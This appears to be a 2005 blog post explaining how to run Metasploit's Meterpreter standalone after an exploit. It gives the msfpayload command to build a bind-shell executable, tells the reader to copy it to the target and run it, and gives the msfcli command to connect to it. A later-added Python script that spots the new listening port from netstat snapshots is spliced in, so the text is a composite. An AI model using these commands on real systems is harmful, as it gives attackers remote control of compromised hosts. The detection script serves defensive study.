Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic. These days I read a thread on the Metasploit mailing list about using the Meterpreter payload as a standalone utility: for example, after exploiting a SQL injection you can upload Meterpreter and work through it. Here is a quick example of how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't had time to test it, but I think it works.
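The bind variant above leaves a listening socket open on the target (LPORT=4321 in the example), and that new listener is the artifact a defender can look for. As an added example that is not part of the original post, the following Python script diffs two netstat -ano style snapshots and reports ports that are listening now but were not in the baseline; the sample lines, port and PIDs are all constructed.

```python
import re
from typing import Dict

# Constructed sample of `netstat -ano` output taken before anything was uploaded.
BASELINE_SNAPSHOT = """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING       4
"""

# Constructed sample taken later: one extra listener on tcp/4321 owned by pid 2476.
LATER_SNAPSHOT = """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4321           0.0.0.0:0              LISTENING       2476
"""

# Matches a Windows netstat line for a listening TCP socket: local addr:port ... LISTENING pid
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_output: str) -> Dict[int, int]:
    """Map each listening TCP port to the PID that owns it; non-listening lines are ignored."""
    listeners: Dict[int, int] = {}
    for line in netstat_output.splitlines():
        match = LINE_RE.match(line)
        if match:
            listeners[int(match.group(2))] = int(match.group(3))
    return listeners


def new_listeners(baseline: str, current: str) -> Dict[int, int]:
    """Return port -> PID for sockets listening in `current` that were absent from `baseline`."""
    before = parse_listeners(baseline)
    after = parse_listeners(current)
    return {port: pid for port, pid in after.items() if port not in before}


if __name__ == "__main__":
    for port, pid in new_listeners(BASELINE_SNAPSHOT, LATER_SNAPSHOT).items():
        print(f"unexpected listener: tcp/{port} owned by pid {pid}")
```

On a real host the two snapshots would come from a scheduled netstat run and a stored baseline, and the owning PID points you at the process to inspect.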

This is great for Windows; if the target system is Unix you could rely on S.E.L.F. (Shellcode ELF Loader), another approach to the same objective, post-exploitation. I recommend taking a look at the S.E.L.F. Phrack article.
